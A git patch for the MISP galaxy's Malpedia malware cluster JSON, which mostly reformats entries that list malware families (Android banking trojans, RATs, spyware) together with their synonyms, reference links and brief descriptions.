"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "3c74a04d-583e-40ec-b347-bdfeb534c614", + "value": "ZhCat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhmimikatz", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "989330e9-52da-4489-888b-686429db3a45", + "value": "ZhMimikatz", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Zeus Terdot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader", + "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", + "https://labs.bitdefender.com/2017/11/terdot-zeus-based-malware-strikes-back-with-a-blast-from-the-past/", + "https://www.arbornetworks.com/blog/asert/great-dga-sphinx/" + ] + }, + "uuid": "13236f94-802b-4abc-aaa9-cb80cf4df9ed", + "value": "Zloader", + "description": "A banking trojan first observed in October 2016 has grown into a sophisticated hacking tool that works primarily as a banking trojan, but could also be used as an infostealer or backdoor." + }, + { + "meta": { + "synonyms": [ + "gresim" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zoxpng", + "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf" + ] + }, + "uuid": "7078d273-8a2d-477a-b6d9-7313e22d9ad7", + "value": "ZoxPNG", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Sensocode" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell", + "https://blogs.cisco.com/security/talos/opening-zxshell", + "https://blogs.rsa.com/cat-phishing/", + "https://github.com/smb01/zxshell" + ] + }, + "uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15", + "value": "ZXShell", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon", + "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html" + ] + }, + "uuid": "721e9af0-8a60-4b9e-9137-c23e86d75722", + "value": "Zyklon", + "description": "" + } + ], + "version": 1649, + "source": "Malpedia", + "name": "Malpedia", + "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e" } From 2d2749cceac2b4ffaae994982640d8f61fc59fc6 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Wed, 10 Oct 2018 22:12:59 +0200 Subject: [PATCH 2/2] jq all the things --- clusters/malpedia.json | 31904 +++++++++++++++++++-------------------- 1 file changed, 15952 insertions(+), 15952 deletions(-) diff --git a/clusters/malpedia.json b/clusters/malpedia.json index 256f76f..42f230d 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json @@ -1,15954 +1,15954 @@ { - "description": "Malware galaxy cluster based on Malpedia.", - "type": "malpedia", - "authors": [ - "Daniel Plohmann", - "Steffen Enders", - "Andrea Garavaglia", - "Davide Arcuri" - ], - "values": [ - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.adultswine", - "https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/" - ] - }, - "uuid": "824f284b-b38b-4a57-9e4a-aee4061a5b2d", - "value": "AdultSwine", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat", - "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html", - "https://github.com/DesignativeDave/androrat" - ] - }, - "uuid": "80447111-8085-40a4-a052-420926091ac6", - "value": "AndroRAT", - "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy", - "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/", - "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf" - ] - }, - "uuid": "06ffb614-33ca-4b04-bf3b-623e68754184", - "value": "AnubisSpy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut", - "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", - "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" - ] - }, - "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", - "value": "Bahamut", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bankbot", - "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", - "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", - "http://blog.koodous.com/2017/05/bankbot-on-google-play.html", - "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", - "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/" - ] - }, - "uuid": "85975621-5126-40cb-8083-55cbfa75121b", - "value": "BankBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites", - "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang", - "https://www.youtube.com/watch?v=1LOy0ZyjEOk" - ] - }, - "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6", - "value": "Catelites", - "description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger", - "http://blog.checkpoint.com/2017/01/24/charger-malware/", - "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html" - ] - }, - "uuid": "6e0545df-8df6-4990-971c-e96c4c60d561", - "value": "Charger", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Pegasus", - "JigglyPuff" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor", - "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", - "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf", - "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", - "https://media.ccc.de/v/33c3-7901-pegasus_internals", - "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/" - ] - }, - "uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad", - "value": "Chrysaor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clientor", - "https://twitter.com/LukasStefanko/status/1042297855602503681" - ] - }, - "uuid": "c0a48ca3-682d-45bc-805c-e62aecd4c724", - "value": "Clientor", - "description": "" - }, - { - "meta": { - "synonyms": [ - "SpyBanker" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.connic", - "https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/" - ] - }, - "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a", - "value": "Connic", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cpuminer", - "https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/" - ] - }, - "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", - "value": "Cpuminer", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.doublelocker", - "https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/" - ] - }, - "uuid": "10d0115a-00b4-414e-972b-8320a2bb873c", - "value": "DoubleLocker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dualtoy", - "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" - ] - }, - "uuid": "8269e779-db23-4c94-aafb-36ee94879417", - "value": "DualToy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap", - "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" - ] - }, - "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b", - "value": "Dvmap", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot", - "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/" - ] - }, - "uuid": "c9f2b058-6c22-462a-a20a-fca933a597dd", - "value": "ExoBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy", - "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" - ] - }, - "uuid": "4305d59a-0d07-4021-a902-e7996378898b", - "value": "FlexiSpy", - "description": "" - }, - { - "meta": { - "synonyms": [ - "gugi" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet", - "https://twitter.com/LukasStefanko/status/886849558143279104" - ] - }, - "uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f", - "value": "FlexNet", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghostctrl", - "https://blog.trendmicro.com/trendlabs-security-intelligence/android-backdoor-ghostctrl-can-silently-record-your-audio-video-and-more/" - ] - }, - "uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5", - "value": "GhostCtrl", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove", - "https://www.clearskysec.com/glancelove/", - "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773", - "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/", - "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/", - "https://www.ci-project.org/blog/2017/3/4/arid-viper" - ] - }, - "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49", - "value": "GlanceLove", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hero_rat", - "https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/" - ] - }, - "uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6", - "value": "HeroRAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.irrat", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" - ] - }, - "uuid": "3e7c6e8c-46fc-4498-a28d-5b3d144c51cf", - "value": "IRRat", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.jaderat", - "https://blog.lookout.com/mobile-threat-jaderat" - ] - }, - "uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0", - "value": "JadeRAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid", - "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html", - "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/" - ] - }, - "uuid": "1e1924b5-89cb-408b-bcee-d6aaef7b24e0", - "value": "KevDroid", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.koler", - "https://twitter.com/LukasStefanko/status/928262059875213312" - ] - }, - "uuid": "4ff34778-de4b-4f48-9184-4975c8ccc3f3", - "value": "Koler", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus", - "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/" - ] - }, - "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", - "value": "Lazarus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus_elf", - "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990" - ] - }, - "uuid": "fe6134aa-6588-4619-8447-57a44eb8b24c", - "value": "Lazarus ELF Backdoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.loki", - "http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/" - ] - }, - "uuid": "a6f481fe-b6db-4507-bb3c-28f10d800e2f", - "value": "Loki", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot", - "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html" - ] - }, - "uuid": "4793a29b-1191-4750-810e-9301a6576fc4", - "value": "LokiBot", - "description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot." - }, - { - "meta": { - "synonyms": [ - "ExoBot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher", - "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware", - "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware", - "https://www.clientsidedetection.com/marcher.html", - "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html" - ] - }, - "uuid": "f691663a-b360-4c0d-a4ee-e9203139c38e", - "value": "Marcher", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mazarbot", - "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/", - "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html" - ] - }, - "uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826", - "value": "MazarBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mysterybot", - "https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html" - ] - }, - "uuid": "0a53ace4-98ae-442f-be64-b8e373948bde", - "value": "MysteryBot", - "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat", - "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/", - "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co" - ] - }, - "uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5", - "value": "OmniRAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Popr-d30" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.popr-d30", - "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/", - "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/" - ] - }, - "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", - "value": "X-Agent", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pornhub" - ] - }, - "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616", - "value": "Fake Pornhub", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.raxir", - "https://twitter.com/PhysicalDrive0/statuses/798825019316916224" - ] - }, - "uuid": "f5cabe73-b5d6-4503-8350-30a6d54c32ef", - "value": "Raxir", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2", - "https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores" - ] - }, - "uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f", - "value": "RedAlert2", - "description": "RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim of being notified.\r\nAs a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe", - "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/", - "http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html", - "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html", - "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html", - "https://www.govcert.admin.ch/blog/33/the-retefe-saga", - "http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html" - ] - }, - "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", - "value": "Retefe", - "description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis", - "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/", - "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/" - ] - }, - "uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82", - "value": "Roaming Mantis", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rootnik", - "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer", - "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java" - ] - }, - "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417", - "value": "Rootnik", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.skygofree", - "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", - "https://cdn.securelist.com/files/2018/01/Skygofree_appendix_eng.pdf" - ] - }, - "uuid": "f5fded3c-8f45-471a-a372-d8be101e1b22", - "value": "Skygofree", - "description": "" - }, - { - "meta": { - "synonyms": [ - "SlemBunk" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo", - "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html", - "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html" - ] - }, - "uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff", - "value": "Slempo", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker", - "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/" - ] - }, - "uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0", - "value": "Slocker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsspy" - ] - }, - "uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab", - "value": "SMSspy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spybanker", - "https://news.drweb.com/show/?i=11104&lng=en", - "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/" - ] - }, - "uuid": "e186384b-8001-4cdd-b170-1548deb8bf04", - "value": "SpyBanker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote", - "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" - ] - }, - "uuid": "31592c69-d540-4617-8253-71ae0c45526c", - "value": "SpyNote", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthagent", - "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" - ] - }, - "uuid": "0777cb30-534f-44bb-a7af-906a422bd624", - "value": "StealthAgent", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthmango", - "https://www.lookout.com/info/stealth-mango-report-ty" - ] - }, - "uuid": "7d480f11-3de8-463d-8a19-54685c8b9e0f", - "value": "Stealth Mango", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng", - "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/" - ] - }, - "uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76", - "value": "Svpeng", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.switcher", - "https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/" - ] - }, - "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e", - "value": "Switcher", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.telerat", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" - ] - }, - "uuid": "e1600d04-d2f7-4862-8bbc-0f038ea683ea", - "value": "TeleRAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tempting_cedar", - "https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware" - ] - }, - "uuid": "982c3554-1df2-4062-8f32-f311940ad9ff", - "value": "TemptingCedar Spyware", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Catelites Android Bot", - "MarsElite Android Bot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz", - "http://blog.group-ib.com/cron" - ] - }, - "uuid": "93b27a50-f9b7-4ab6-bb9f-70a4b914eec3", - "value": "TinyZ", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.titan", - "https://blog.lookout.com/titan-mobile-threat", - "https://www.alienvault.com/blogs/labs-research/delivery-keyboy" - ] - }, - "uuid": "7d418da3-d9d2-4005-8cc7-7677d1b11327", - "value": "Titan", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada", - "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/", - "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html", - "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", - "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/", - "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/" - ] - }, - "uuid": "fa5fdfd2-8142-43f5-9b48-d1033b5398c8", - "value": "Triada", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001", - "https://twitter.com/illegalFawn/status/826775250583035904" - ] - }, - "uuid": "bbd5a32e-a080-4f16-98ea-ad8863507aa6", - "value": "Unidentified APK 001", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002" - ] - }, - "uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544", - "value": "Unidentified APK 002", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat", - "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/", - "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/" - ] - }, - "uuid": "3482f5fe-f129-4c77-ae98-76e25f6086b9", - "value": "Viper RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex", - "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/", - "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/" - ] - }, - "uuid": "77f2254c-9886-4eed-a7c3-bbcef4a97d46", - "value": "WireX", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot", - "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/", - "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/" - ] - }, - "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387", - "value": "Xbot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xrat", - "https://blog.lookout.com/xrat-mobile-threat" - ] - }, - "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32", - "value": "XRat", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark", - "https://securelist.com/whos-who-in-the-zoo/85394", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf" - ] - }, - "uuid": "b1fc66de-fda7-4f0c-af00-751d334444b3", - "value": "ZooPark", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Qysly" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg", - "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1", - "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2", - "https://securelist.com/ztorg-from-rooting-to-sms/78775/" - ] - }, - "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202", - "value": "Ztorg", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.backdoor_irc16", - "https://news.drweb.com/show/?c=5&i=10193&lng=en" - ] - }, - "uuid": "3008fa01-492a-42e2-ab9b-a0a9d12823b8", - "value": "Irc16", - "description": "" - }, - { - "meta": { - "synonyms": [ - "gayfgt", - "Gafgyt", - "qbot", - "torlus", - "lizkebab" - ], - "type": [], - "refs": [ - 